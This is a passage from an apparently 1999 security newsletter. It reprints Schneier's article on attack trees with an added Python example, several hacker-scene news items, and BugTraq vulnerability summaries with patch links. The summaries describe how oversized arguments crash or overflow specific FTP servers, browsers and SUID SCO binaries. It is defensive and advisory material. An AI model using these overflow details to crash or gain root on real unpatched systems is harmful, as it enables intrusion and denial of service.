Mr Azzara said consumers should "go ahead, make the phone call" when passing over credit card information unless the security of the site was established. The message of the survey, he said, is: "Buyer beware! Don't be a victim."

Additional information about IDC is available at www.idc.com.

Copyright (c) Post-Newsweek Business Information, Inc. All rights reserved.

@HWA

21.0 Attack Trees Help to Model Security Threats
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by Evil Wench

     With new security weaknesses showing up on a daily basis, how do you model threats against computer systems? Bruce Schneier has come up with a formal methodology for analyzing the security of systems and subsystems, known as 'Attack Trees'.

     Dr. Dobb's Journal
     http://www.ddj.com/articles/1999/9912/9912a/9912a.htm

Attack Trees

Dr. Dobb's Journal December 1999

Modeling security threats

By Bruce Schneier

Bruce is the CTO of Counterpane Internet Security, author of Applied Cryptography, Second Edition (John Wiley & Sons, 1995), and inventor of the Blowfish and Twofish encryption algorithms. You can contact Bruce at http://www.counterpane.com/.

Few people truly understand computer security, as illustrated by computer-security company marketing literature that touts "hacker proof software," "triple-DES security," and the like. In truth, unbreakable security is broken all the time, often in ways its designers never imagined. Seemingly strong cryptography gets broken, too. Attacks thought to be beyond the ability of mortal men become commonplace. And as newspapers report security bug after security bug, it becomes increasingly clear that the term "security" doesn't have meaning unless you also know things like "Secure from whom?" or "Secure for how long?"

Clearly, what we need is a way to model threats against computer systems. If we can understand all the different ways in which a system can be attacked, we can likely design countermeasures to thwart those attacks. And if we can understand who the attackers are -- not to mention their abilities, motivations, and goals -- maybe we can install the proper countermeasures to deal with the real threats.

Enter Attack Trees

Attack trees provide a formal, methodical way of describing the security of systems, based on varying attacks. Basically, you represent attacks against a system in a tree structure, with the goal as the root node and different ways of achieving that goal as leaf nodes. Figure 1, for instance, is a simple attack tree against a physical safe. The goal is opening the safe. To open the safe, attackers can pick the lock, learn the combination, cut open the safe, or install the safe improperly so that they can easily open it later.
To learn the combination, they either have to find the combination written down or get the combination from the safe owner. And so on. Each node becomes a subgoal, and children of that node are ways to achieve that subgoal. (Of course, this is just a sample attack tree, and an incomplete one at that. How many other attacks can you think of that would achieve the goal?)

Note that there are AND nodes and OR nodes (in the figures, everything that isn't an AND node is an OR node). OR nodes are alternatives -- the four ways to open a safe, for example. AND nodes represent different steps toward achieving the same goal. To eavesdrop on someone saying the safe combination, attackers have to eavesdrop on the conversation AND get the safe owner to say the combination. Attackers can't achieve the goal unless both subgoals are satisfied.

That's the basic attack tree. Once you have it completed, you can assign values -- I (impossible) and P (possible) in Figure 1 -- to the various leaf nodes, then make calculations about the nodes. (Again, this is only an illustrative example; do not take the values as an indication of how secure my safe really is.) Once you assign these values -- presumably this assignment will be the result of painstaking research on the safe itself -- you can calculate the security of the goal. The value of an OR node is possible if any of its children are possible, and impossible if all of its children are impossible. The value of an AND node is possible only if all children are possible, and impossible otherwise; see Figure 2.

The dotted lines in Figure 2 show all possible attacks -- a hierarchy of possible nodes, from a leaf to the goal. In this sample system, there are two possible attacks: cutting open the safe, or learning the combination by bribing the owner of the safe. With this knowledge, you know exactly how to defend this system against attack.

Assigning "possible" and "impossible" to the nodes is just one way to look at the tree.
Any Boolean value can be assigned to the leaf nodes and then propagated up the tree structure in the same manner: easy versus difficult, expensive versus inexpensive, intrusive versus nonintrusive, legal versus illegal, special equipment required versus no special equipment. Figure 3 shows the same tree with another Boolean node value.

Assigning "expensive" and "not expensive" to nodes is useful, but it would be better to show exactly how expensive. It is also possible to assign continuous values to nodes. Figure 4 shows the tree with different costs assigned to the leaf nodes. Like Boolean node values, these can propagate up the tree as well. OR nodes have the value of their cheapest child; AND nodes have the value of the sum of their children. In Figure 4, the costs have propagated up the tree, and the cheapest attack has been highlighted.

Again, this tree can be used to determine where a system is vulnerable. Figure 5 shows all attacks that cost less than $100,000. If you are only concerned with attacks that are less expensive (maybe the contents of the safe are only worth $100,000), then you should only concern yourself with those attacks. There are many other possible continuous node values, including probability of success of a given attack, likelihood that an attacker will try a given attack, and so on.

Nodes and Their Values

In any real attack tree, nodes will have many different values corresponding to many different variables, both Boolean and continuous. Different node values can be combined to learn even more about a system's vulnerabilities. Figure 6, for instance, determines the cheapest attack requiring no special equipment. You can also find the cheapest low-risk attack, most likely nonintrusive attack, best low-skill attack, cheapest attack with the highest probability of success, most likely legal attack, and so on. Every time you query the attack tree about a certain characteristic of attack, you learn more about the system's security.
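The propagation rules above, the attack enumeration of Figures 2 and 5, and the combined "cheapest attack with no special equipment" query of Figure 6 (together with the countermeasure "what if" the article turns to next), as a small Python implementation. This is an added example, not code from the article, Counterpane or HWA; the safe tree's shape is the article's, but every cost, possible/impossible flag and equipment flag below is constructed, since the figures are not reproduced in the newsletter.

```python
"""Attack-tree evaluation following the safe example in Schneier's article.

Added example, not code from the article, Counterpane or HWA. The AND/OR
nodes, the propagation rules and the queries are the article's; every leaf
value below is constructed, since the figures are not reproduced here.
"""
import copy
from dataclasses import dataclass, field
from typing import Callable, List, Optional, Tuple


@dataclass
class Node:
    name: str
    kind: str = "OR"                  # "OR", "AND" or "LEAF"
    children: List["Node"] = field(default_factory=list)
    possible: bool = True             # Boolean leaf value (Figure 1 style)
    cost: int = 0                     # continuous leaf value, dollars (Figure 4 style)
    special_equipment: bool = False   # second Boolean leaf value (Figure 6 style)


Pred = Callable[[Node], bool]         # constraint on which leaves may be used


def leaf(name, cost, possible=True, special_equipment=False):
    return Node(name, "LEAF", [], possible, cost, special_equipment)


def OR(name, *children):
    return Node(name, "OR", list(children))


def AND(name, *children):
    return Node(name, "AND", list(children))


def is_possible(node: Node) -> bool:
    """Boolean propagation: an OR needs any possible child, an AND needs all."""
    if node.kind == "LEAF":
        return node.possible
    results = [is_possible(c) for c in node.children]
    return all(results) if node.kind == "AND" else any(results)


def cheapest(node: Node, allowed: Pred = lambda n: True) -> Optional[int]:
    """Cost propagation: OR takes its cheapest child, AND sums its children.
    Leaves rejected by `allowed` are unavailable; None means no attack is left."""
    if node.kind == "LEAF":
        return node.cost if allowed(node) else None
    costs = [cheapest(c, allowed) for c in node.children]
    if node.kind == "AND":
        return None if any(c is None for c in costs) else sum(costs)
    feasible = [c for c in costs if c is not None]
    return min(feasible) if feasible else None


def attacks(node: Node, allowed: Pred = lambda n: True) -> List[Tuple[int, List[str]]]:
    """Enumerate complete attacks (the dotted lines of Figures 2 and 5)
    as (total cost, leaf names) pairs."""
    if node.kind == "LEAF":
        return [(node.cost, [node.name])] if allowed(node) else []
    if node.kind == "OR":
        return [a for c in node.children for a in attacks(c, allowed)]
    combos = [(0, [])]  # AND: every combination of the children's attacks
    for c in node.children:
        combos = [(cost + cc, names + cn)
                  for cost, names in combos for cc, cn in attacks(c, allowed)]
    return combos


def attacks_under(node: Node, budget: int, allowed: Pred = lambda n: True):
    """All attacks costing at most `budget`, cheapest first (Figure 5 style)."""
    return sorted(a for a in attacks(node, allowed) if a[0] <= budget)


def what_if(node: Node, leaf_name: str, new_cost: int) -> Node:
    """Copy of the tree with one leaf re-costed, to model a countermeasure."""
    tree = copy.deepcopy(node)
    stack = [tree]
    while stack:
        n = stack.pop()
        if n.kind == "LEAF" and n.name == leaf_name:
            n.cost = new_cost
        stack.extend(n.children)
    return tree


def no_special_equipment(n: Node) -> bool:
    return not n.special_equipment


def build_safe_tree() -> Node:
    """The article's safe tree; costs and flags are constructed, not the figures'."""
    return OR("open safe",
        leaf("pick lock", 30_000, possible=False, special_equipment=True),
        OR("learn combination",
            leaf("find combination written down", 75_000, possible=False),
            OR("get combination from owner",
                leaf("threaten owner", 60_000, possible=False),
                leaf("blackmail owner", 100_000, possible=False),
                AND("eavesdrop on combination",
                    leaf("listen to conversation", 60_000, possible=False, special_equipment=True),
                    leaf("get owner to state combination", 20_000, possible=False)),
                leaf("bribe owner", 20_000))),
        leaf("cut open safe", 10_000, special_equipment=True),
        leaf("install safe improperly", 150_000, possible=False))


if __name__ == "__main__":
    tree = build_safe_tree()
    print("cheapest with no special equipment: $", cheapest(tree, no_special_equipment))
    print("after raising the bribe to $80,000: $",
          cheapest(what_if(tree, "bribe owner", 80_000), no_special_equipment))
```

With these constructed values the no-special-equipment query returns $20,000 (the bribe) and rises to $60,000 (threatening the owner) once the bribe leaf is re-costed to $80,000, reproducing the numbers the article quotes for Figure 6.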
To make this work, you must marry attack trees with knowledge about attackers. Different attackers have different levels of skill, access, risk aversion, money, and so on. If you're worried about organized crime, you have to worry about expensive attacks and attackers who are willing to go to jail. If you are worried about terrorists, you also have to worry about attackers who are willing to die to achieve their goal. If you're worried about bored graduate students studying the security of your system, you usually don't have to worry about illegal attacks such as bribery and blackmail. The characteristics of your attacker determine which parts of the attack tree you have to worry about.

Attack trees also let you play "what if" games with potential countermeasures. In Figure 6, for example, the goal has a cost of $20,000. This is because the cheapest attack requiring no special equipment is bribing the person who knows the combination. What if you implemented a countermeasure -- paying that person more so that he is less susceptible to bribes? If you assume that the cost to bribe him is now $80,000 (again, this is an example; in the real world you'd be expected to research exactly how a countermeasure affects the node value), then the cost increases to $60,000 (presumably to hire the thugs to do the threatening).

A PGP Example

Figure 7 is an attack tree for the popular PGP e-mail security program. Since PGP is a complex program, this is a complex tree, and it's easier to write it in outline form than graphically. PGP has several security features, so this is only one of several attack trees for PGP. This particular attack tree has "read a message encrypted with PGP" as its goal. Other goals might be: "forge someone else's signature on a message," "change the signature on a message," "undetectably modify a PGP-signed or PGP-encrypted message," and so on.
What immediately becomes apparent from the attack tree is that breaking the RSA or IDEA encryption algorithms is not the most profitable attack against PGP. There are many ways to read someone's PGP-encrypted messages without breaking the cryptography. You can capture their screen when they decrypt and read the messages (using a Trojan horse like Back Orifice, a TEMPEST receiver, or a secret camera), grab their private key after they enter a passphrase (Back Orifice again, or a dedicated computer virus), recover their passphrase (a keyboard sniffer, TEMPEST receiver, or Back Orifice), or simply try to brute force their passphrase (I can assure you that it will have much less entropy than the 128-bit IDEA keys that it generates). In the scheme of things, the choice of algorithm and the key length is probably the least important thing that affects PGP's overall security. PGP not only has to be secure, but it has to be used in an environment that leverages that security without creating any new insecurities.

Creating Attack Trees

How do you create an attack tree like this? First, you identify the possible attack goals. Each goal forms a separate tree, although they might share subtrees and nodes. Then, try to think of all attacks against each goal. Add them to the tree. Repeat this process down the tree until you are done. Give the tree to someone else, and have him think about the process and add any nodes he thinks of. Repeat as necessary, possibly over the course of several months. Of course there's always the chance that you forgot about an attack, but you'll get better with time. Like any security analysis, creating attack trees requires a certain mindset and takes practice.

Once you have the attack tree, and have researched all the node values (these values will change over time, both as attacks become easier and as you get more exact information on the values), you can use the attack tree to make security decisions.
You can look at the values of the root node to see if the system's goal is vulnerable to attack. You can determine if the system is vulnerable to a particular kind of attack; password guessing, for instance. You can use the attack tree to list the security assumptions of a system; for example, the security of PGP might assume that no one could successfully bribe the programmers. You can determine the impact of a system modification or a new vulnerability discovery: recalculate the nodes based on the new information and see how the goal node is affected. And you can compare and rank attacks -- which is cheaper, which is more likely to succeed, and the like.

One of the surprising things that comes out of this kind of analysis is that the areas people think of as vulnerable usually aren't. With PGP, for example, people generally worry about key length. Should they use 1024-bit RSA or 2048-bit RSA? Looking at the attack tree, though, shows that the key length of RSA doesn't really matter. There are all sorts of other attacks -- installing a keyboard sniffer, modifying the program on the victim's hard drive -- that are much easier than breaking the RSA public key. Increasing the key length from 1024 bits to 2048 bits is like putting an enormous stake into the ground and hoping the enemy runs right into it, as opposed to building a lower palisade around the target. Attack trees give you perspective on the whole system.

One of the things that really makes attack trees valuable is that they capture knowledge in a reusable form. Once you've completed the PGP attack tree, you can use it in any situation that uses PGP. The attack tree against PGP becomes part of a larger attack tree. For example, Figure 8 shows an attack tree whose goal is to read a specific message that has been sent from one Windows 98 computer to another. If you look at the root nodes of the tree, the entire attack trees for PGP and for opening a safe fit into this attack tree.
This scalability means that you don't have to be an expert in everything. If you're using PGP in a system, you don't have to know the details of the PGP attack tree; all you need to know are the values of the root node. If you're a computer-security expert, you don't have to know the details about how difficult a particular model of safe is to crack; you just need to know the values of the root node. Once you build up a library of attack trees against particular computer programs, door and window locks, network security protocols, or whatever, you can reuse them whenever you need to. For a national security agency concerned about compartmentalizing attack expertise, this kind of system is very useful.

Conclusion

Attack trees provide a formal methodology for analyzing the security of systems and subsystems. They provide a way to think about security, to capture and reuse expertise about security, and to respond to changes in security. Security is not a product -- it's a process. Attack trees form the basis of understanding that process.

DDJ

@HWA

22.0 Pandora Updated
~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Simple Nomad

Jitsu-Disk finished moving the Pandora Linux code so that Pandora Linux uses libpcap and libnet. Pandora is a set of tools for testing the security and insecurity of Novell Netware. A number of problems have been corrected from the beta release on November 19th, including several problems involving spoofing and sniffing. Libnet helped Jitsu fix all that. The documentation has also been updated, including all the code used to do the builds, and pre-compiled binaries, all wrapped up in a nice big tarball.

Nomad Mobile Research Center
http://www.nmrc.org/pandora/

@HWA

23.0 [sSh] Busted or Not?
~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Ender

Numerous contradictory reports about the raids and arrests of YTCracker and Darkness of [sSh] have been received by HNN and other sources.
It is pretty clear at this time that YTCracker has not been arrested, yet. (He feels that it is only a matter of time.) OSALL has been trying to keep track of the rumors and innuendoes and get accurate information regarding this breaking story or non-story.

OSALL
http://www.aviary-mag.com/News/SSH_Busts/ssh_busts.html

[sSh] Busts
12/02/99
Mike Hudack
Editor-in-Chief

Note: The following information is presented as best as possible. Contradictions have been streaming into the OSAll headquarters from two FBI agents, numerous Web site defacers and several other people. All claim to know what's going on, but all contradict each other. We're leaving this story intact for now, until the dust settles and we can determine the facts of the case, as it were.

Correction: YTCracker has not been raided. OSAll spoke with YTCracker at 1:00pm eastern time, confirming that he had not been raided by the FBI or any other government agency. Previous reports published on OSAll and HNN stated that YTCracker had been raided, citing rumors and, in one case on OSAll, an anonymous FBI source. It appears that these reports were incorrect.

As of right now it has been confirmed that Darkness has been visited by NASA investigative authorities. FBI visits have not been confirmed but have been mentioned by an anonymous FBI source. The validity and reliability of this FBI source is being called into question as more evidence comes to light. The source expects "a number of groups to fall soon" but gave no timeline or even a guarantee of further arrests. The FBI has already seized logs relating to a number of attacks, including visiting an ISP that one defacer funneled his attacks through. Both the FBI and US Attorney's Office have denied official comment on an "ongoing investigation."
@HWA

24.0 Response to Freedom Extraordinary
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Jordan

Thursday's long-anticipated launch of Freedom 1.0 by Zero Knowledge Systems has proved to be an extraordinary success. Freedom works seamlessly alongside your favorite browser and other Internet applications. You can surf the web, send email, chat, telnet, and participate in newsgroups as you normally would, only now with complete confidence that your personal information is not being collected without your consent. Freedom identifies you on the net with a 'nym' that you choose. There can be only one 'nym', so you may want to reserve your online identity as soon as you can.

Freedom 1.0
http://www.zks.net/clickthrough/click.asp?partner_id=542

@HWA

25.0 DCypher.net Team Created
~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by dcypher

A team for the Hacker News Network has been created at DCypher.net. DCypher.Net has accepted the CS Group's CS-Cipher challenge and will attempt to break their 56 bit key using a brute force attack in a distributed computing effort. They promise to give the entire $10,500 prize to whoever actually finds the correct key. (Now that is a pretty strong incentive.)

DCypher.net
http://www.dcypher.net/

HNN Stats at DCypher.net
TeamID:131

Don't forget about our team over at SETI@Home, the search for extraterrestrial life.

SETI@Home
http://setiathome.ssl.berkeley.edu/

HNN SETI@Home Team Stats
http://setiathome.ssl.berkeley.edu/stats/team/team_2251.html

@HWA

26.0 Hackers Make it to Mars
~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Desolationroad

At approximately 12 Noon PST on Friday December 3rd, 1999 a 42 square foot (3.816 sq meters) extremely dense ball of complicated electronics will arrive at the end of its twelve month journey.
The 1,270 pound (576 kg) mass of extremely sophisticated cutting-edge technology will crash land onto the surface of an extraterrestrial location. (Now that's a damn hack if I ever heard of one.)

Jet Propulsion Laboratory
http://marslander.jpl.nasa.gov/index.html

@HWA

27.0 Security Focus Newsletter #17
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security Focus Newsletter #17

Table of Contents:

I.    INTRODUCTION
II.   BUGTRAQ SUMMARY
      1. NetTerm FTP Server Multiple Vulnerabilities
      2. Microsoft IE5 XML HTTP Redirect Vulnerability
      3. Sun Java IDE Webserver IP Restriction Failure Vulnerability
      4. Vermillion FTPd CWD DoS Vulnerability
      5. Mdaemon WebConfig Overflow DoS Vulnerability
      6. Cabletron SSR ARP Flood DoS Vulnerability
      7. Netscape Navigator Long ASP Argument Vulnerability
      8. Deerfield WorldClient Long URL DoS Vulnerability
      9. SCO Xsco Buffer Overflow Vulnerability
      10. SCO xlock(1) (long username) Buffer Overflow Vulnerability
      11. SCO su(1) Buffer Overflow Vulnerability
III.  PATCH UPDATES
      1. Vulnerability Patched: Linux syslogd Denial of Service
      2. Vulnerability Patched: Solaris rpc.ttdbserver Denial of Service
      3. Vulnerability Patched: Cabletron SSR ARP Flood DoS
      4. Vulnerability Patched: SCO su(1) Buffer Overflow
      5. Vulnerability Patched: Pine Environment Variable Expansion in URLS
IV.   INCIDENTS SUMMARY
      1. Re: Port 137 and snmp scans (Thread)
      2. SunOS rpcbind scans (Thread)
      3. Re: cracker probing 1542 (Thread)
      4. Re: rpc logging (Thread)
      5. SANS and CERT ICMP advisories (Thread)
      6. Fw: unsolicited connection(s) (Thread)
      7. F5's 3DNS signature + Cisco Distrib Dir (Thread)
      8. Insane amount of probes from 216.212.in-addr.arpa (tin.it) (Thread)
      9. BIND Scanning (Thread)
      10. sweep (Thread)
      11. pop3/imap crawler.. (Thread)
      12. UK Law & Cases Re Malicious action/attacks (Thread)
      13. cgi attack
      14. Re: problems from ip69.net247221.cr.sk.ca[24.72.21.69] (Thread)
      15. Port 98 scans & new 3128/8080 scans
V.    VULN-DEV RESEARCH LIST SUMMARY
      1. Re: icq accounts (Thread)
      2. Re: WordPad/riched20.dll buffer overflow (Thread)
      3. SSH exploit (Thread)
      4. lanma256.bmp/lanmannt.bmp security risk? (Thread)
      5. Re: development of wordpad exploit (Thread)
VI.   SECURITY JOBS
      Seeking Staff:
      1. SecurityFocus.com is looking for staff writers for a Windows NT column!
      2. NYC - Internet Security Position
      3. Security Research Engineer
VII.  SECURITY SURVEY RESULTS
VIII. SECURITY FOCUS TOP 6 TOOLS
      1. SecurityFocus.com Pager (Win95/98/NT)
      2. Lookout (Windows 2000, Windows 95/98 and Windows NT)
      3. cgicheck99 0.4 (Any system supporting rebol)
      4. HookProtect (Windows 95/98 and Windows NT)
      5. Sun Enterprise Network Security Service Early Access 1 (Java)
      6. Pandora for Linux v4 beta 2 (Linux)
IX.   SPONSOR INFORMATION - CORE SDI
X.    SUBSCRIBE/UNSUBSCRIBE INFORMATION

I. INTRODUCTION
-----------------

Welcome to the Security Focus 'week in review' newsletter issue 17 sponsored by CORE SDI.

http://www.core-sdi.com

II. BUGTRAQ SUMMARY 1999-11-21 to 1999-11-27
---------------------------------------------

1. NetTerm FTP Server Multiple Vulnerabilities
BugTraq ID: 819
Remote: Yes
Date Published: 1999-11-22
Relevant URL: http://www.securityfocus.com/bid/819
Summary:
InterSoft's internet suite includes an FTP server which has been found to have numerous vulnerabilities. Among them:

The default configuration allows read/write access to the root of the C: drive for anonymous users. This write access includes overwrite and delete. If the server is set up with 'out of the box' options, anonymous remote users have full access to the operating system files and executables.

There is no administrator account, which means that any user with console access can alter the server's settings.

The encryption method used on the passwords for user accounts is reported to be weak and easily broken.

There are also multiple buffer overflows. Supplying over 1024-character arguments to the following commands will crash the server: dir, ls, mkdir, delete, and rmdir.
Also, although the PASS buffer is truncated at 16 characters for users with accounts, this limit is not in place for the anonymous user (to allow for proper entry of email addresses as passwords), and a 1024-byte string 'password' will crash the server if user name 'anonymous' is supplied. It may be possible to exploit these overflows to run arbitrary code.

2. Microsoft IE5 XML HTTP Redirect Vulnerability
BugTraq ID: 815
Remote: Yes
Date Published: 1999-11-22
Relevant URL: http://www.securityfocus.com/bid/815
Summary:
A vulnerability in the method IE5 uses to process XML data may allow a malicious web site owner to read files on a visiting user's computer. A web page may be created that contains an XML object type that contains instructions to read known files on a visitor's local host (and/or domain). The IE5 client will allow the XML redirect to access files within its own domain.

3. Sun Java IDE Webserver IP Restriction Failure Vulnerability
BugTraq ID: 816
Remote: Yes
Date Published: 1999-11-23
Relevant URL: http://www.securityfocus.com/bid/816
Summary:
These Java development applications include an http server for testing purposes. The server can be configured to only respond to requests from certain IP addresses; however, the mechanism fails and any requests received are serviced. The server will allow read access to any file on the filesystem that it has access to, all the way up to the root directory. In the Netbeans product, this is the default 'out of the box' configuration. In the Forte product, IP addresses must be added manually to a list of permitted clients. Once a single IP address is added, any requests regardless of source are responded to.

4. Vermillion FTPd CWD DoS Vulnerability
BugTraq ID: 818
Remote: Yes
Date Published: 1999-11-22
Relevant URL: http://www.securityfocus.com/bid/818
Summary:
If the Vermillion FTP Daemon (VFTPD) receives three consecutive CWD commands with arguments of 504 characters or longer, it will crash.

5. Mdaemon WebConfig Overflow DoS Vulnerability
BugTraq ID: 820
Remote: Unknown
Date Published: 1999-11-24
Relevant URL: http://www.securityfocus.com/bid/820
Summary:
The Mdaemon mail server for Windows includes a small web server for web-based remote administration. This webserver is vulnerable due to an unchecked buffer that handles incoming GET requests. An abnormally large URL sent to the WebConfig service at port 2002 will crash the service.

6. Cabletron SSR ARP Flood DoS Vulnerability
BugTraq ID: 821
Remote: Yes
Date Published: 1999-11-24
Relevant URL: http://www.securityfocus.com/bid/821
Summary:
The Cabletron SmartSwitch Router 8000 with firmware revision 2.x has been shown to be susceptible to a denial of service attack. The SSR can only handle approximately 200 ARP requests per second. If an attacker can get ICMP traffic to the router, they can flood it with ARP requests, effectively shutting the router down for the duration of the attack.

7. Netscape Navigator Long ASP Argument Vulnerability
BugTraq ID: 822
Remote: Yes
Date Published: 1999-11-26
Relevant URL: http://www.securityfocus.com/bid/822
Summary:
Netscape Communicator 4.7 has been shown to crash when an argument of 800 characters is supplied to a command in an asp page. Some of the data passed as the argument makes it into the EIP and EBP registers, so execution of arbitrary code is a possibility. The overflow could be embedded in a link on a webpage or in an email message for remote attacks.

8. Deerfield WorldClient Long URL DoS Vulnerability
BugTraq ID: 823
Remote: Yes
Date Published: 1999-11-26
Relevant URL: http://www.securityfocus.com/bid/823
Summary:
Deerfield's WorldClient is an email webserver that allows its users to retrieve email via HTTP. It is susceptible to denial of service attacks due to an unchecked buffer in the request handler. Supplying a long url will crash the server.

9. SCO Xsco Buffer Overflow Vulnerability
BugTraq ID: 824
Remote: No
Date Published: 1999-11-25
Relevant URL: http://www.securityfocus.com/bid/824
Summary:
Under certain versions of Unixware, the SUID program Xsco is vulnerable to a buffer overflow attack. The problem lies in that Xsco does not sanity check user supplied data.

10. SCO xlock(1) (long username) Buffer Overflow Vulnerability
BugTraq ID: 825
Remote: No
Date Published: 1999-11-25
Relevant URL: http://www.securityfocus.com/bid/825
Summary:
Certain versions of Unixware ship with a version of xlock which is vulnerable to a buffer overflow attack. The xlock(1) program locks the local X display until a username and password are entered. In this instance a user can provide an overly long username and overflow a buffer in xlock(1). Given that xlock(1) runs SUID root, this will result in a root compromise.

11. SCO su(1) Buffer Overflow Vulnerability
BugTraq ID: 826
Remote: No
Date Published: 1999-11-25
Relevant URL: http://www.securityfocus.com/bid/826
Summary:
Certain versions of Unixware ship with a version of su(1) which is vulnerable to a buffer overflow attack. This attack is possible because su(1) fails to sanity check user supplied data, in this instance a username supplied on the command line. Because su(1) is SUID root, this attack may result in root privileges.

III. PATCH UPDATES 1999-11-21 to 1999-11-27
-------------------------------------------

1. Vendor: Red Hat
Product: RedHat Linux
Patch Location:

Red Hat Linux 4.x:
Intel:
ftp://updates.redhat.com/4.2/i386/sysklogd-1.3.31-0.5.i386.rpm
ftp://updates.redhat.com/4.2/i386/libc-5.3.12-18.5.i386.rpm
ftp://updates.redhat.com/4.2/i386/libc-debug-5.3.12-18.5.i386.rpm
ftp://updates.redhat.com/4.2/i386/libc-devel-5.3.12-18.5.i386.rpm
ftp://updates.redhat.com/4.2/i386/libc-profile-5.3.12-18.5.i386.rpm
ftp://updates.redhat.com/4.2/i386/libc-static-5.3.12-18.5.i386.rpm
Alpha:
ftp://updates.redhat.com/4.2/alpha/sysklogd-1.3.31-0.5.alpha.rpm
Sparc:
ftp://updates.redhat.com/4.2/sparc/sysklogd-1.3.31-0.5.sparc.rpm
ftp://updates.redhat.com/4.2/sparc/libc-5.3.12-18.5.sparc.rpm
ftp://updates.redhat.com/4.2/sparc/libc-debug-5.3.12-18.5.sparc.rpm
ftp://updates.redhat.com/4.2/sparc/libc-devel-5.3.12-18.5.sparc.rpm
ftp://updates.redhat.com/4.2/sparc/libc-profile-5.3.12-18.5.sparc.rpm
ftp://updates.redhat.com/4.2/sparc/libc-static-5.3.12-18.5.sparc.rpm
Source packages:
ftp://updates.redhat.com/4.2/SRPMS/sysklogd-1.3.31-0.5.src.rpm
ftp://updates.redhat.com/4.2/SRPMS/libc-5.3.12-18.5.src.rpm

Red Hat Linux 5.x:
Intel:
ftp://updates.redhat.com/5.2/i386/sysklogd-1.3.31-1.5.i386.rpm
Alpha:
ftp://updates.redhat.com/5.2/alpha/sysklogd-1.3.31-1.5.alpha.rpm
Sparc:
ftp://updates.redhat.com/5.2/sparc/sysklogd-1.3.31-1.5.sparc.rpm
Source packages:
ftp://updates.redhat.com/5.2/SRPMS/sysklogd-1.3.31-1.5.src.rpm

Red Hat Linux 6.0:
Intel:
ftp://updates.redhat.com/6.0/i386/sysklogd-1.3.31-14.i386.rpm
Alpha:
ftp://updates.redhat.com/6.0/alpha/sysklogd-1.3.31-14.alpha.rpm
Sparc:
ftp://updates.redhat.com/6.0/sparc/sysklogd-1.3.31-14.sparc.rpm
Source packages:
ftp://updates.redhat.com/6.0/SRPMS/sysklogd-1.3.31-14.src.rpm

Red Hat Linux 6.1:
Intel:
ftp://updates.redhat.com/6.1/i386/sysklogd-1.3.31-14.i386.rpm
Source packages:
ftp://updates.redhat.com/6.1/SRPMS/sysklogd-1.3.31-14.src.rpm

The following patches are for Cobalt Networks RAQ and Qube servers which run RedHat Linux:

RPMS:
-RaQ3-
ftp://ftp.cobaltnet.com/pub/experimental/security/i386/sysklogd-1.3.33-9C1.i386.rpm
-RaQ1 RaQ2 Qube1 Qube2-
ftp://ftp.cobaltnet.com/pub/experimental/security/mips/sysklogd-1.3.33-9C2.mips.rpm
SRPMS:
ftp://ftp.cobaltnet.com/pub/experimental/security/srpms/sysklogd-1.3.33-9C1.src.rpm
ftp://ftp.cobaltnet.com/pub/experimental/security/srpms/sysklogd-1.3.33-9C2.src.rpm

Vulnerability Patched: Linux syslogd Denial of Service Vulnerability
BugTraq ID: 809
Relevant URLS: http://www.securityfocus.com/bid/809

2. Vendor: Sun Microsystems
Product: Solaris 7
Patch Location: http://sunsolve.sun.com/pub-cgi/show.pl?target=patches/patch-license&nav=pub-patches
Vulnerability Patched: Solaris rpc.ttdbserver Denial of Service Vulnerability
BugTraq ID: 811
Relevant URLS: http://www.securityfocus.com/bid/811

3. Vendor: Cabletron
Product: Cabletron SmartSwitch Router 8000 firmware 2.x
Patch Location: http://www.cabletron.com/download/download.cgi?lib=ssr
Vulnerability Patched: Cabletron SSR ARP Flood DoS Vulnerability
BugTraq ID: 821
Relevant URLS: http://www.securityfocus.com/bid/821

4. Vendor: SCO
Product: Unixware
Patch Location:
Anonymous ftp (World Wide Web URL):
ftp://ftp.sco.COM/SSE/sse039.ltr (cover letter, ASCII text)
ftp://ftp.sco.COM/SSE/sse039.tar.Z (new binaries, compressed tar file)
Compuserve:
GO SCOFORUM, and search Library 11 (SLS/SSE Files) for these filenames:
SSE039.LTR (cover letter, ASCII text)
SSE039.TAZ (new binaries, compressed tar file)
Vulnerability Patched: SCO su(1) Buffer Overflow Vulnerability
BugTraq ID: 826
Relevant URLS:
http://www.sco.com/support/ftplists/index.html
http://www.securityfocus.com/bid/

5. Vendor: Caldera
Product: Caldera OpenLinux (and its other distributions)
Patch Location: ftp://ftp.calderasystems.com/pub/OpenLinux/updates/2.3/current/RPMS/
Vulnerability Patched: Pine Environment Variable Expansion in URLS Vulnerability
BugTraq ID: 810
Relevant URLS: http://www.securityfocus.com/bid/810

IV. INCIDENTS SUMMARY 1999-11-21 to 1999-11-27
------------------------------------------

1. Re: Port 137 and snmp scans (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=Pine.LNX.4.10.9911220749020.615-100000@epr0.org

2. SunOS rpcbind scans (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=XFMail.991122220828.ldavis@fastq.com

3. Re: cracker probing 1542 (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991122172139.12644.qmail@securityfocus.com

4. Re: rpc logging (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991122224453.1743.qmail@securityfocus.com

5. SANS and CERT ICMP advisories (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991123051240.12076.qmail@securityfocus.com

6. Fw: unsolicited connection(s) (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=01aa01bf3599$17618a40$30a238cd@bbn.com

7. F5's 3DNS signature + Cisco Distrib Dir (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991124021152.13054.qmail@securityfocus.com

